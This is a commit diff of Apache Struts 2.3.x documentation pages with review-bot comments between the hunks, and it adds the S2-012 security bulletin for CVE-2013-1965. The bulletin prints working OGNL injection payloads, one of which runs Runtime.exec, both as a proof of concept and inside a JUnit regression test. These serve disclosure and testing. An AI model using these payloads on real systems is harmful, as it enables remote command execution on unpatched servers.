+<DIV class="panelMacro"><TABLE class="tipMacro"><COLGROUP><COL width="24"><COL></COLGROUP><TR><TD valign="top"><IMG src="https://cwiki.apache.org/confluence/images/icons/emoticons/check.gif" width="16" height="16" align="absmiddle" alt="" border="0"></TD><TD>To suggest a change or a correction to any part of the documentation, log in and leave a comment on the appropriate page. We are always looking for <A href="http://struts.apache.org/2.x/docs/contributors-guide.html" class="external-link" rel="nofollow">help with the documentation&#33;</A></TD></TR></TABLE></DIV>
 
 <H2><A name="FAQs-Next%3ACookbook"></A>Next: <A href="cookbook.html" title="Cookbook">Cookbook</A></H2>
         </DIV>
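Review bot: the only change to the Errata tip is 'documentation!' becoming 'documentation&#33;', while the GAE hunk above in this same file goes the other way and decodes '&#40;GAE&#41;' to '(GAE)'. Neither edit changes the rendered page, so this reads as exporter churn. Settling on one entity policy in the export would keep regenerated pages from producing noise diffs that hide the real content changes in a commit this size.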

Modified: websites/production/struts/content/release/2.3.x/docs/guides.html
==============================================================================
--- websites/production/struts/content/release/2.3.x/docs/guides.html (original)
+++ websites/production/struts/content/release/2.3.x/docs/guides.html Sun May 26 21:38:59 2013
@@ -352,6 +352,9 @@ under the License. 
 <H3><A name="Guides-VersionNotes2.3.x"></A>Version Notes 2.3.x</H3>
 
 <UL>
+	<LI><A href="version-notes-2315.html" title="Version Notes 2.3.15">Version Notes 2.3.15</A></LI>
+	<LI><A href="version-notes-23142.html" title="Version Notes 2.3.14.2">Version Notes 2.3.14.2</A></LI>
+	<LI><A href="version-notes-23141.html" title="Version Notes 2.3.14.1">Version Notes 2.3.14.1</A></LI>
 	<LI><A href="version-notes-2314.html" title="Version Notes 2.3.14">Version Notes 2.3.14</A></LI>
 	<LI><A href="version-notes-2312.html" title="Version Notes 2.3.12">Version Notes 2.3.12</A></LI>
 	<LI><A href="version-notes-238.html" title="Version Notes 2.3.8">Version Notes 2.3.8</A></LI>

Modified: websites/production/struts/content/release/2.3.x/docs/home.html
==============================================================================
--- websites/production/struts/content/release/2.3.x/docs/home.html (original)
+++ websites/production/struts/content/release/2.3.x/docs/home.html Sun May 26 21:38:59 2013
@@ -138,7 +138,7 @@ under the License. 
 
 <DIV class="panelMacro"><TABLE class="tipMacro"><COLGROUP><COL width="24"><COL></COLGROUP><TR><TD valign="top"><IMG src="https://cwiki.apache.org/confluence/images/icons/emoticons/check.gif" width="16" height="16" align="absmiddle" alt="" border="0"></TD><TD>Have a suggestion, correction, or improvement? <A href="http://cwiki.apache.org/confluence/display/WW/Home" class="external-link" rel="nofollow">Log in</A> and leave a comment on the appropriate page or file a ticket against the Struts 2 documentation. <A href="contributors-guide.html" title="Contributors Guide">We're always looking for help!</A></TD></TR></TABLE></DIV>
 
-<P>We've started planning the next version of Struts aka Struts 3 which will break backward compatibility, if you want to join please add your two cents <A href="struts-3.html" title="Struts 3">here</A>.</P>
+<DIV class="panelMacro"><TABLE class="noteMacro"><COLGROUP><COL width="24"><COL></COLGROUP><TR><TD valign="top"><IMG src="https://cwiki.apache.org/confluence/images/icons/emoticons/warning.gif" width="16" height="16" align="absmiddle" alt="" border="0"></TD><TD>We've started planning the next version of Struts aka Struts 3 (or 2.5) which will break backward compatibility, if you want to join please add your two cents <A href="struts-next.html" title="Struts Next">here</A>.</TD></TR></TABLE></DIV>
 
 <H2><A name="Home-GettingStarted"></A>Getting Started</H2>
 
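Review bot: the new note panel points at 'struts-next.html' where the removed paragraph pointed at 'struts-3.html', and nothing in the visible part of this commit leaves a stub or redirect for the old page, so existing inbound links to 'struts-3.html' will break. The sentence is also a comma splice and now names two candidate versions ('Struts 3 (or 2.5)'). Suggested wording: 'We have started planning the next version of Struts (Struts 3 or 2.5), which will break backward compatibility. If you want to join, please add your two cents here.' The identical edit is repeated in index.html and needs the same fix.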
@@ -215,7 +215,7 @@ under the License. 
                           <A href="other-resources.html" title="Other Resources">Other Resources</A>
               <SPAN class="smalltext">(Apache Struts 2 Documentation)</SPAN>
               <BR>
-                          <A href="struts-3.html" title="Struts 3">Struts 3</A>
+                          <A href="struts-next.html" title="Struts Next">Struts Next</A>
               <SPAN class="smalltext">(Apache Struts 2 Documentation)</SPAN>
               <BR>
                       </DIV>

Modified: websites/production/struts/content/release/2.3.x/docs/index.html
==============================================================================
--- websites/production/struts/content/release/2.3.x/docs/index.html (original)
+++ websites/production/struts/content/release/2.3.x/docs/index.html Sun May 26 21:38:59 2013
@@ -138,7 +138,7 @@ under the License. 
 
 <DIV class="panelMacro"><TABLE class="tipMacro"><COLGROUP><COL width="24"><COL></COLGROUP><TR><TD valign="top"><IMG src="https://cwiki.apache.org/confluence/images/icons/emoticons/check.gif" width="16" height="16" align="absmiddle" alt="" border="0"></TD><TD>Have a suggestion, correction, or improvement? <A href="http://cwiki.apache.org/confluence/display/WW/Home" class="external-link" rel="nofollow">Log in</A> and leave a comment on the appropriate page or file a ticket against the Struts 2 documentation. <A href="contributors-guide.html" title="Contributors Guide">We're always looking for help!</A></TD></TR></TABLE></DIV>
 
-<P>We've started planning the next version of Struts aka Struts 3 which will break backward compatibility, if you want to join please add your two cents <A href="struts-3.html" title="Struts 3">here</A>.</P>
+<DIV class="panelMacro"><TABLE class="noteMacro"><COLGROUP><COL width="24"><COL></COLGROUP><TR><TD valign="top"><IMG src="https://cwiki.apache.org/confluence/images/icons/emoticons/warning.gif" width="16" height="16" align="absmiddle" alt="" border="0"></TD><TD>We've started planning the next version of Struts aka Struts 3 (or 2.5) which will break backward compatibility, if you want to join please add your two cents <A href="struts-next.html" title="Struts Next">here</A>.</TD></TR></TABLE></DIV>
 
 <H2><A name="Home-GettingStarted"></A>Getting Started</H2>
 
@@ -215,7 +215,7 @@ under the License. 
                           <A href="other-resources.html" title="Other Resources">Other Resources</A>
               <SPAN class="smalltext">(Apache Struts 2 Documentation)</SPAN>
               <BR>
-                          <A href="struts-3.html" title="Struts 3">Struts 3</A>
+                          <A href="struts-next.html" title="Struts Next">Struts Next</A>
               <SPAN class="smalltext">(Apache Struts 2 Documentation)</SPAN>
               <BR>
                       </DIV>

Modified: websites/production/struts/content/release/2.3.x/docs/interceptors.html
==============================================================================
--- websites/production/struts/content/release/2.3.x/docs/interceptors.html (original)
+++ websites/production/struts/content/release/2.3.x/docs/interceptors.html Sun May 26 21:38:59 2013
@@ -581,6 +581,11 @@ under the License. 
 <TD class="confluenceTd"> Inject cookie with a certain configurable name / value into action. (Since 2.0.7.) </TD>
 </TR>
 <TR>
+<TD class="confluenceTd"> <A href="cookieprovider-interceptor.html" title="CookieProvider Interceptor">CookieProvider Interceptor</A> </TD>
+<TD class="confluenceTd"> cookieProvider </TD>
+<TD class="confluenceTd"> Transfer cookies from action to response (Since 2.3.15.) </TD>
+</TR>
+<TR>
 <TD class="confluenceTd"> <A href="conversion-error-interceptor.html" title="Conversion Error Interceptor">Conversion Error Interceptor</A> </TD>
 <TD class="confluenceTd"> conversionError </TD>
 <TD class="confluenceTd"> Adds conversion errors from the ActionContext to the Action's field errors </TD>
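Review bot: the new cookieProvider row says only 'Transfer cookies from action to response (Since 2.3.15.)', which does not tell a reader what an action has to expose for the interceptor to pick the cookies up. The Cookie row just above at least mentions the configurable name and value. Please add a short phrase on how the action supplies the cookies, since that decides who is responsible for what ends up in the response.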
@@ -686,7 +691,7 @@ under the License. 
 <TD class="confluenceTd"> Performs validation using the validators defined in <EM>action</EM>&#45;validation.xml </TD>
 </TR>
 <TR>
-<TD class="confluenceTd"> <A href="workflow-interceptor.html" title="Workflow Interceptor">Workflow Interceptor</A> </TD>
+<TD class="confluenceTd"> <A href="default-workflow-interceptor.html" title="Default Workflow Interceptor">Default Workflow Interceptor</A> </TD>
 <TD class="confluenceTd"> workflow </TD>
 <TD class="confluenceTd"> Calls the <TT>validate</TT> method in your Action class. If Action errors are created then it returns the <TT>INPUT</TT> view. </TD>
 </TR>
@@ -896,7 +901,7 @@ thisWillRunFirstInterceptor
                           <A href="create-session-interceptor.html" title="Create Session Interceptor">Create Session Interceptor</A>
               <SPAN class="smalltext">(Apache Struts 2 Documentation)</SPAN>
               <BR>
-                          <A href="workflow-interceptor.html" title="Workflow Interceptor">Workflow Interceptor</A>
+                          <A href="default-workflow-interceptor.html" title="Default Workflow Interceptor">Default Workflow Interceptor</A>
               <SPAN class="smalltext">(Apache Struts 2 Documentation)</SPAN>
               <BR>
                           <A href="exception-interceptor.html" title="Exception Interceptor">Exception Interceptor</A>

Modified: websites/production/struts/content/release/2.3.x/docs/logging.html
==============================================================================
--- websites/production/struts/content/release/2.3.x/docs/logging.html (original)
+++ websites/production/struts/content/release/2.3.x/docs/logging.html Sun May 26 21:38:59 2013
@@ -127,10 +127,10 @@ under the License. 
 
 <P>XWork provides its own layer to support logging - it allows to use many different implementations.</P>
 
-<P>Currently XWork provides support for following libraries:</P>
+<P>Currently XWork provides support for the following libraries (in that order base on classpath discovery):</P>
 <UL class="alternate" type="square">
+	<LI>Commons Logging</LI>
 	<LI>SLF4J</LI>
-	<LI>commons-logging</LI>
 	<LI>JDK Logger</LI>
 </UL>
 
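Review bot: in the added sentence, 'in that order base on classpath discovery' should read 'in that order, based on classpath discovery'. The list now documents precedence and Commons Logging has moved ahead of SLF4J, so if the intent is that the first library found on the classpath wins, say so explicitly. An application with both jars present needs to know which one its logs, including any audit logging, will actually go through.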

Modified: websites/production/struts/content/release/2.3.x/docs/migration-guide.html
==============================================================================
--- websites/production/struts/content/release/2.3.x/docs/migration-guide.html (original)
+++ websites/production/struts/content/release/2.3.x/docs/migration-guide.html Sun May 26 21:38:59 2013
@@ -129,6 +129,9 @@ under the License. 
 <H3><A name="MigrationGuide-VersionNotes2.3.x"></A>Version Notes 2.3.x</H3>
 
 <UL>
+	<LI><A href="version-notes-2315.html" title="Version Notes 2.3.15">Version Notes 2.3.15</A></LI>
+	<LI><A href="version-notes-23142.html" title="Version Notes 2.3.14.2">Version Notes 2.3.14.2</A></LI>
+	<LI><A href="version-notes-23141.html" title="Version Notes 2.3.14.1">Version Notes 2.3.14.1</A></LI>
 	<LI><A href="version-notes-2314.html" title="Version Notes 2.3.14">Version Notes 2.3.14</A></LI>
 	<LI><A href="version-notes-2312.html" title="Version Notes 2.3.12">Version Notes 2.3.12</A></LI>
 	<LI><A href="version-notes-238.html" title="Version Notes 2.3.8">Version Notes 2.3.8</A></LI>
@@ -431,6 +434,12 @@ under the License. 
                           <A href="version-notes-2314.html" title="Version Notes 2.3.14">Version Notes 2.3.14</A>
               <SPAN class="smalltext">(Apache Struts 2 Documentation)</SPAN>
               <BR>
+                          <A href="version-notes-23141.html" title="Version Notes 2.3.14.1">Version Notes 2.3.14.1</A>
+              <SPAN class="smalltext">(Apache Struts 2 Documentation)</SPAN>
+              <BR>
+                          <A href="version-notes-2315.html" title="Version Notes 2.3.15">Version Notes 2.3.15</A>
+              <SPAN class="smalltext">(Apache Struts 2 Documentation)</SPAN>
+              <BR>
                       </DIV>
         
       </DIV>
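Review bot: this child-page list gains entries for 2.3.14.1 and 2.3.15 but not 2.3.14.2, although the Version Notes list in the hunk above (and the one in guides.html) links to 'version-notes-23142.html'. Either add the missing entry here or confirm that the 2.3.14.2 page is exported as a child of this guide, so the new link has a target.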

Modified: websites/production/struts/content/release/2.3.x/docs/osgi-plugin.html
==============================================================================
--- websites/production/struts/content/release/2.3.x/docs/osgi-plugin.html (original)
+++ websites/production/struts/content/release/2.3.x/docs/osgi-plugin.html Sun May 26 21:38:59 2013
@@ -126,7 +126,7 @@ under the License. 
           <H2><A name="OSGiPlugin-Overview"></A>Overview</H2>
 <DIV class="panelMacro"><TABLE class="noteMacro"><COLGROUP><COL width="24"><COL></COLGROUP><TR><TD valign="top"><IMG src="https://cwiki.apache.org/confluence/images/icons/emoticons/warning.gif" width="16" height="16" align="absmiddle" alt="" border="0"></TD><TD>This plugin is only experimental and can change in the future.</TD></TR></TABLE></DIV>
 
-<P>This plugin provides support for starting an instance of Apache Felix inside a web application, and scanning installed bundles for Struts configuration. An admin bundle is also provided.</P>
+<P>This plugin provides support for starting an instance of Apache Felix inside a web application, and scanning installed bundles for Struts configuration. An admin bundle is also provided. It can be used with Glassfish 3 as well (Glassfish 3 based on Apache Felix as well), but in such a way <TT>struts.osgi.host</TT> must be defined.</P>
 
 <H2><A name="OSGiPlugin-Features"></A>Features</H2>
 
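Review bot: the sentence added to the Overview paragraph is hard to parse: 'Glassfish 3 based on Apache Felix as well' is missing a verb, and 'in such a way' should be 'in that case'. Suggested wording: 'It can also be used with Glassfish 3, which is itself based on Apache Felix, but in that case struts.osgi.host must be defined.'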
@@ -189,10 +189,6 @@ Import-Package: com.opensymphony.xwork2
 <SPAN class="code-tag">&lt;constant name=<SPAN class="code-quote">&quot;struts.objectFactory.delegate&quot;</SPAN> value=<SPAN class="code-quote">&quot;springOsgi&quot;</SPAN> /&gt;</SPAN>
 </PRE>
 </DIV></DIV></LI>
-</OL>
-
-
-<OL>
 	<LI>Configure your <B>web.xml</B> like:
 <DIV class="code panel" style="border-width: 1px;"><DIV class="codeContent panelContent">
 <PRE class="code-xml">
@@ -250,10 +246,6 @@ Import-Package: com.opensymphony.xwork2
 <SPAN class="code-tag">&lt;/web-app&gt;</SPAN>
 </PRE>
 </DIV></DIV></LI>
-</OL>
-
-
-<OL>
 	<LI>Add the Spring OSGi, and Spring Web dependencies to your web app, if you are using maven:
 <DIV class="code panel" style="border-width: 1px;"><DIV class="codeContent panelContent">
 <PRE class="code-xml">
@@ -389,6 +381,17 @@ org.springframework.web-2.5.5.A.jar
 <SPAN class="code-tag">&lt;/context-param&gt;</SPAN>
 </PRE>
 </DIV></DIV>
+
+<P>If you are running your application on Glassfish 3 (which already contains Apache Felix) you must specify <TT>struts.osgi.host</TT>, like below:</P>
+<DIV class="code panel" style="border-width: 1px;"><DIV class="codeContent panelContent">
+<PRE class="code-xml">
+<SPAN class="code-tag">&lt;context-param&gt;</SPAN>
+    <SPAN class="code-tag">&lt;param-name&gt;</SPAN>struts.osgi.host<SPAN class="code-tag">&lt;/param-name&gt;</SPAN>
+    <SPAN class="code-tag">&lt;param-value&gt;</SPAN>Glassfish<SPAN class="code-tag">&lt;/param-value&gt;</SPAN>
+<SPAN class="code-tag">&lt;/context-param&gt;</SPAN>
+</PRE>
+</DIV></DIV>
+
 <DIV class="table-wrap">
 <TABLE class="confluenceTable"><TBODY>
 <TR>
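Review bot: the new Glassfish paragraph shows 'struts.osgi.host' set to 'Glassfish' but does not say which other values are accepted or what is used when the parameter is absent. If the parameter table that follows this block does not already have a row for 'struts.osgi.host', add one there with the accepted values and the default, so the example is not the only documentation of the setting.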

Modified: websites/production/struts/content/release/2.3.x/docs/parameters-interceptor.html
==============================================================================
--- websites/production/struts/content/release/2.3.x/docs/parameters-interceptor.html (original)
+++ websites/production/struts/content/release/2.3.x/docs/parameters-interceptor.html Sun May 26 21:38:59 2013
@@ -234,6 +234,22 @@ over ParametersInterceptor which means i
 <P>The best idea is to define very tight restrictions with ParametersInterceptor and relax them per action with
 @{link ParameterNameAware#acceptableParameterName(String)}</P></TD></TR></TABLE></DIV>
 
+<H2><A name="ParametersInterceptor-Warningonmissingparameters"></A>Warning on missing parameters</H2>
+
+<P>When there is no setter for given parameter name, a warning message like below will be logged in devMode:</P>
+
+<DIV class="preformatted panel" style="border-width: 1px;"><DIV class="preformattedContent panelContent">
+<PRE>SEVERE: Developer Notification (set struts.devMode to false to disable this message):
+Unexpected Exception caught setting 'search' on 'class demo.ItemSearchAction: Error setting expression 'search' with value ['search', ]
+Error setting expression 'search' with value ['search', ] - [unknown location]
+	at com.opensymphony.xwork2.ognl.OgnlValueStack.handleRuntimeException(OgnlValueStack.java:201)
+	at com.opensymphony.xwork2.ognl.OgnlValueStack.setValue(OgnlValueStack.java:178)
+	at com.opensymphony.xwork2.ognl.OgnlValueStack.setParameter(OgnlValueStack.java:152)
+</PRE>
+</DIV></DIV>
+
+<P>Thus is expected behaviour to allow developer to spot missing setter or typo in either parameter name or setter.</P>
+
 <H2><A name="ParametersInterceptor-Examples"></A>Examples</H2>
 
 <DIV class="code panel" style="border-width: 1px;"><DIV class="codeContent panelContent">
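Review bot: 'Thus is expected behaviour' should be 'This is expected behaviour', and the heading 'Warning on missing parameters' does not match the text, which describes a parameter that has no matching setter. The sample output is logged at SEVERE while the sentence above it calls it a warning message, so state which level to expect. Since the message appears only in devMode and echoes the submitted parameter name and value along with a stack trace, this section is also a good place to remind readers that struts.devMode should be false in production.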

Added: websites/production/struts/content/release/2.3.x/docs/s2-012.html
==============================================================================
--- websites/production/struts/content/release/2.3.x/docs/s2-012.html (added)
+++ websites/production/struts/content/release/2.3.x/docs/s2-012.html Sun May 26 21:38:59 2013
@@ -0,0 +1,262 @@
+
+<!-- 
+Licensed to the Apache Software Foundation (ASF) under one
+or more contributor license agreements.  See the NOTICE file
+distributed with this work for additional information
+regarding copyright ownership.  The ASF licenses this file
+to you under the Apache License, Version 2.0 (the
+"License"); you may not use this file except in compliance
+with the License.  You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE- 2.0
+
+Unless required by applicable law or agreed to in writing,
+software distributed under the License is distributed on an
+"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+KIND, either express or implied.  See the License for the
+specific language governing permissions and limitations
+under the License. 
+-->
+
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<HTML>
+  <HEAD>
+    <LINK type="text/css" rel="stylesheet" href="https://struts.apache.org/css/default.css">
+    <STYLE type="text/css">
+      .dp-highlighter {
+        width:95% !important;
+      }
+    </STYLE>
+    <STYLE type="text/css">
+      .footer {
+        background-image:      url('https://cwiki.apache.org/confluence/images/border/border_bottom.gif');
+        background-repeat:     repeat-x;
+        background-position:   left top;
+        padding-top:           4px;
+        color:                 #666;
+      }
+    </STYLE>
+    <SCRIPT type="text/javascript" language="javascript">
+      var hide = null;
+      var show = null;
+      var children = null;
+
+      function init() {
+        /* Search form initialization */
+        var form = document.forms['search'];
+        if (form != null) {
+          form.elements['domains'].value = location.hostname;
+          form.elements['sitesearch'].value = location.hostname;
+        }
+
+        /* Children initialization */
+        hide = document.getElementById('hide');
+        show = document.getElementById('show');
+        children = document.all != null ?
+                   document.all['children'] :
+                   document.getElementById('children');
+        if (children != null) {
+          children.style.display = 'none';
+          show.style.display = 'inline';
+          hide.style.display = 'none';
+        }
+      }
+
+      function showChildren() {
+        children.style.display = 'block';
+        show.style.display = 'none';
+        hide.style.display = 'inline';
+      }
+
+      function hideChildren() {
+        children.style.display = 'none';
+        show.style.display = 'inline';
+        hide.style.display = 'none';
+      }
+    </SCRIPT>
+    <TITLE>S2-012</TITLE>
+  <META http-equiv="Content-Type" content="text/html;charset=UTF-8"></HEAD>
+  <BODY onload="init()">
+    <TABLE border="0" cellpadding="2" cellspacing="0" width="100%">
+      <TR class="topBar">
+        <TD align="left" valign="middle" class="topBarDiv" align="left" nowrap="">
+          &nbsp;<A href="home.html" title="Apache Struts 2 Documentation">Apache Struts 2 Documentation</A>&nbsp;&gt;&nbsp;<A href="home.html" title="Home">Home</A>&nbsp;&gt;&nbsp;<A href="security-bulletins.html" title="Security Bulletins">Security Bulletins</A>&nbsp;&gt;&nbsp;<A href="" title="S2-012">S2-012</A>
+        </TD>
+        <TD align="right" valign="middle" nowrap="">
+          <FORM name="search" action="http://www.google.com/search" method="get">
+            <INPUT type="hidden" name="ie" value="UTF-8">
+            <INPUT type="hidden" name="oe" value="UTF-8">
+            <INPUT type="hidden" name="domains" value="">
+            <INPUT type="hidden" name="sitesearch" value="">
+            <INPUT type="text" name="q" maxlength="255" value="">        
+            <INPUT type="submit" name="btnG" value="Google Search">
+          </FORM>
+        </TD>
+      </TR> 
+    </TABLE>
+
+    <DIV id="PageContent">
+      <DIV class="pageheader" style="padding: 6px 0px 0px 0px;">
+        <!-- We'll enable this once we figure out how to access (and save) the logo resource -->
+        <!--img src="/wiki/images/confluence_logo.gif" style="float: left; margin: 4px 4px 4px 10px;" border="0"-->
+        <DIV style="margin: 0px 10px 0px 10px" class="smalltext">Apache Struts 2 Documentation</DIV>
+        <DIV style="margin: 0px 10px 8px 10px" class="pagetitle">S2-012</DIV>
+
+        <DIV class="greynavbar" align="right" style="padding: 2px 10px; margin: 0px;">
+          <A href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=31818222">
+            <IMG src="https://cwiki.apache.org/confluence/images/icons/notep_16.gif" height="16" width="16" border="0" align="absmiddle" title="Edit Page"></A>
+            <A href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=31818222">Edit Page</A>
+          &nbsp;
+          <A href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">
+            <IMG src="https://cwiki.apache.org/confluence/images/icons/browse_space.gif" height="16" width="16" border="0" align="absmiddle" title="Browse Space"></A>
+            <A href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">Browse Space</A>
+          &nbsp;
+          <A href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=31818222">
+            <IMG src="https://cwiki.apache.org/confluence/images/icons/add_page_16.gif" height="16" width="16" border="0" align="absmiddle" title="Add Page"></A>
+          <A href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=31818222">Add Page</A>
+          &nbsp;
+          <A href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=31818222">
+            <IMG src="https://cwiki.apache.org/confluence/images/icons/add_blogentry_16.gif" height="16" width="16" border="0" align="absmiddle" title="Add News"></A>
+          <A href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=31818222">Add News</A>
+        </DIV>
+      </DIV>
+
+      <DIV class="pagecontent">
+        <DIV class="wiki-content">
+          <H2><A name="S2-012-Summary"></A>Summary</H2>
+
+
+<P>Showcase app vulnerability allows remote command execution</P>
+
+
+<DIV class="table-wrap">
+<TABLE class="confluenceTable"><TBODY>
+<TR>
+<TH class="confluenceTh">Who should read this</TH>
+<TD class="confluenceTd">All Struts 2 developers</TD>
+</TR>
+<TR>
+<TH class="confluenceTh">Impact of vulnerability</TH>
+<TD class="confluenceTd">Remote command execution</TD>
+</TR>
+<TR>
+<TH class="confluenceTh">Maximum security rating</TH>
+<TD class="confluenceTd">Moderately Critical</TD>
+</TR>
+<TR>
+<TH class="confluenceTh">Recommendation</TH>
+<TD class="confluenceTd">Developers should immediately upgrade to <A href="http://struts.apache.org/download.cgi#struts23141" class="external-link" rel="nofollow">Struts 2.3.14.1</A></TD>
+</TR>
+<TR>
+<TH class="confluenceTh">Affected Software</TH>
+<TD class="confluenceTd"> Struts Showcase App 2.0.0 - Struts Showcase App 2.3.13 </TD>
+</TR>
+<TR>
+<TH class="confluenceTh">Reporter</TH>
+<TD class="confluenceTd"> Xgc Kxlzx, Alibaba Security Team </TD>
+</TR>
+<TR>
+<TH class="confluenceTh">CVE Identifier</TH>
+<TD class="confluenceTd"><A href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1965" class="external-link" rel="nofollow">CVE-2013-1965</A></TD>
+</TR>
+<TR>
+<TH class="confluenceTh">Original Description</TH>
+<TD class="confluenceTd"> Reported directly to security@a.o</TD>
+</TR>
+</TBODY></TABLE>
+</DIV>
+
+<H2><A name="S2-012-Problem"></A>Problem</H2>
+
+<P>OGNL provides, among other features, extensive expression <A href="http://commons.apache.org/ognl/language-guide.html#Expression_Evaluation" class="external-link" rel="nofollow">evaluation capabilities</A>. <BR>
+A request that included a specially crafted request parameter could be used to inject arbitrary OGNL code into a property, afterward used as request parameter of a redirect address, which will cause a further evaluation. </P>
+
+<P>OGNL evaluation was already addressed in <A href="s2-003.html" title="S2-003">S2&#45;003</A> and <A href="s2-005.html" title="S2-005">S2&#45;005</A> and <A href="s2-009.html" title="S2-009">S2&#45;009</A>, but, since it involved just the parameter's name, it turned out that the resulting fixes based on whitelisting acceptable parameter names and denying evaluation of the expression contained in parameter names, closed the vulnerability only partially. </P>
+
+<P>The second evaluation happens when redirect result reads it from the stack and uses the previously injected code as redirect parameter.<BR>
+This lets malicious users put arbitrary OGNL statements into any unsanitized String variable exposed by an action and have it evaluated as an OGNL expression to enable method execution and execute arbitrary methods, bypassing Struts and OGNL library protections.</P>
+
+<H2><A name="S2-012-Proofofconcept"></A>Proof of concept</H2>
+
+<OL>
+	<LI>Run struts2-showcase</LI>
+	<LI>Open url: <A href="http://localhost:8080/struts2-showcase/skill/edit.action?skillName=SPRING-DEV" class="external-link" rel="nofollow">http://localhost:8080/struts2-showcase/skill/edit.action?skillName=SPRING-DEV</A></LI>
+	<LI>write skill name to %{expr} for example:
+<DIV class="code panel" style="border-width: 1px;"><DIV class="codeContent panelContent">
+<PRE class="code-java">%{(#_memberAccess['allowStaticMethodAccess']=<SPAN class="code-keyword">true</SPAN>)(#context['xwork.MethodAccessor.denyMethodExecution']=<SPAN class="code-keyword">false</SPAN>) #hackedbykxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#hackedbykxlzx.println('hacked by kxlzx'),#hackedbykxlzx.close())}
+</PRE>
+</DIV></DIV></LI>
+	<LI>submit the form</LI>
+</OL>
+
+
+<P>The issue, in order to work, need a redirect result defined as the following:</P>
+<DIV class="code panel" style="border-width: 1px;"><DIV class="codeContent panelContent">
+<PRE class="code-java">
+&lt;action name=<SPAN class="code-quote">&quot;save&quot;</SPAN> class=<SPAN class="code-quote">&quot;org.apache.struts2.showcase.action.SkillAction&quot;</SPAN> method=<SPAN class="code-quote">&quot;save&quot;</SPAN>&gt;
+    &lt;result type=<SPAN class="code-quote">&quot;redirect&quot;</SPAN>&gt;edit.action?skillName=${currentSkill.name}&lt;/result&gt;
+&lt;/action&gt;
+</PRE>
+</DIV></DIV>    
+
+<H3><A name="S2-012-JUnitVersion"></A>JUnit Version</H3>
+<DIV class="code panel" style="border-width: 1px;"><DIV class="codeContent panelContent">
+<PRE class="code-java">
+<SPAN class="code-keyword">public</SPAN> void testUnsecureRedirect() {
+    <SPAN class="code-keyword">final</SPAN> <SPAN class="code-object">String</SPAN> pwnDir = <SPAN class="code-quote">&quot;/tmp/PWNAGE&quot;</SPAN>;
+    <SPAN class="code-keyword">final</SPAN> Map&lt;<SPAN class="code-object">String</SPAN>, <SPAN class="code-object">String</SPAN>&gt; fakeAction = <SPAN class="code-keyword">new</SPAN> HashMap&lt;<SPAN class="code-object">String</SPAN>, <SPAN class="code-object">String</SPAN>&gt;() {
+        {
+            put(<SPAN class="code-quote">&quot;skillName&quot;</SPAN>, <SPAN class="code-quote">&quot;%{(#context['xwork.MethodAccessor.denyMethodExecution']=<SPAN class="code-keyword">false</SPAN>)(#_memberAccess['allowStaticMethodAccess']=<SPAN class="code-keyword">true</SPAN>)(@java.lang.<SPAN class="code-object">Runtime</SPAN>@getRuntime().exec('mkdir &quot;</SPAN> + pwnDir + <SPAN class="code-quote">&quot;'))}&quot;</SPAN>);
+        }
+    };
+
+    <SPAN class="code-object">String</SPAN> location = <SPAN class="code-quote">&quot;/context/edit.action?skillName=<SPAN class="code-keyword">true</SPAN>&quot;</SPAN>;
+    responseMock.expectAndReturn(<SPAN class="code-quote">&quot;encodeRedirectURL&quot;</SPAN>, C.anyArgs(1), location);
+    responseMock.expect(<SPAN class="code-quote">&quot;sendRedirect&quot;</SPAN>, C.args(C.eq(location)));
+    requestMock.expectAndReturn(<SPAN class="code-quote">&quot;getAttribute&quot;</SPAN>, C.args(C.eq(<SPAN class="code-quote">&quot;javax.servlet.include.servlet_path&quot;</SPAN>)), location);
+
+    ValueStack stack = ai.getStack();
+    stack.push(fakeAction);
+
+    view.setLocation(<SPAN class="code-quote">&quot;edit.action?skillName=${skillName}&quot;</SPAN>);
+    view.setParse(<SPAN class="code-keyword">true</SPAN>);
+
+
+    <SPAN class="code-keyword">try</SPAN> {
+        view.execute(ai);
+
+        requestMock.verify();
+
+        File pwn = <SPAN class="code-keyword">new</SPAN> File(pwnDir);
+        <SPAN class="code-object">boolean</SPAN> exists = pwn.exists();
+        FileUtils.deleteDirectory(pwn);
+        assertFalse(<SPAN class="code-quote">&quot;Remote exploit: The PWN folder has been created&quot;</SPAN>, exists);
+
+        <SPAN class="code-object">Object</SPAN> dme = stack.getContext().get(<SPAN class="code-quote">&quot;xwork.MethodAccessor.denyMethodExecution&quot;</SPAN>);
+
+        assertTrue(<SPAN class="code-quote">&quot;DenyMethodExecution has been disabled&quot;</SPAN>, dme == <SPAN class="code-keyword">null</SPAN> || BooleanUtils.toBoolean(dme.toString()));
+
+    } <SPAN class="code-keyword">catch</SPAN> (Exception e) {
+        e.printStackTrace();
+        fail();
+    }
+}
+</PRE>
+</DIV></DIV>
+<H2><A name="S2-012-Solution"></A>Solution</H2>
+
+<P>The OGNLUtil class was changed to deny eval expressions by default. </P>
+
+<DIV class="panelMacro"><TABLE class="warningMacro"><COLGROUP><COL width="24"><COL></COLGROUP><TR><TD valign="top"><IMG src="https://cwiki.apache.org/confluence/images/icons/emoticons/forbidden.gif" width="16" height="16" align="absmiddle" alt="" border="0"></TD><TD><B>It is strongly recommended to upgrade to <A href="http://struts.apache.org/download.cgi#struts23141" class="external-link" rel="nofollow">Struts 2.3.14.1</A>, which contains the corrected OGNL and XWork library.</B></TD></TR></TABLE></DIV>
+        </DIV>
+
+        
+      </DIV>
+    </DIV>
+    <DIV class="footer">
+      Generated by
+      <A href="http://www.atlassian.com/confluence/">Atlassian Confluence</A> (Version: 3.4.9 Build: 2042 Feb 14, 2011)
+      <A href="http://could.it/autoexport/">Auto Export Plugin</A> (Version: 1.0.0-dkulp)
+    </DIV>
+  </BODY>
+</HTML>
\ No newline at end of file
